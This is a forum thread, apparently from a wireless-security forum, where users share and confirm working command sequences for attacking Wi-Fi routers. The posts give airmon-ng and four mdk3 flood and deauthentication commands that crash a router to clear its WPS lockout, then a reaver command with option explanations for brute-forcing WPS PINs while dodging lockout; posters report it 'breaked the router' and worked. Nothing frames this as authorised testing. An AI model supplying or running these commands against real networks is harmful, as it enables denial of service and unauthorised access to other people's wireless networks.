Results 1 to 50 of 161

Thread: MDK3 Secret Destruction Mode

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    2013-Dec
    Posts
    5
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.

  2. #2
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by bad_bobby View Post
    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.
    I usually run reaver like this:

    Code:
    reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv -a -S -N -E
    Sometimes, (like I said earlier), add this to the end:

    Code:
    -r x:y
    Where x= number of attempts and y= delay after x number of attempts, so -r 2:300 would try 2 pins every 5 minutes.

    The other variables in the command mean this:

    -a Auto select some advanced features.

    -S Use small diffleman attacks (reduces strain on the router).

    -N No nacks, just speeds things up a bit.

    -E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

    Other than this, there is really no way to prevent the locks.
    Last edited by soxrok2212; 2013-12-27 at 22:28.

  3. #3
    Join Date
    2013-Dec
    Posts
    11

    Talking

    Quote Originally Posted by bad_bobby View Post
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options based on people's experiences that reduce the liklihood of a lockout.
    same situation here, authentication flood alone does nothing, but combined with -b, -d, -m commands breaked the router in a few minutes, and unlocked them

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by VinnyG View Post
    same situation here, authentication flood alone does nothing, but combined with -b, -d, -m commands breaked the router in a few minutes, and unlocked them
    Glad to know it worked!

Similar Threads

  1. MDK3 on 5Ghz
    By klawil in forum General Archive
    Replies: 3
    Last Post: 2017-05-24, 11:50
  2. MDK3 problem
    By wewe73 in forum TroubleShooting Archive
    Replies: 4
    Last Post: 2015-10-26, 14:14
  3. My Secret SSH user ...
    By prompt_32 in forum How-To Archive
    Replies: 2
    Last Post: 2014-01-14, 00:51

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •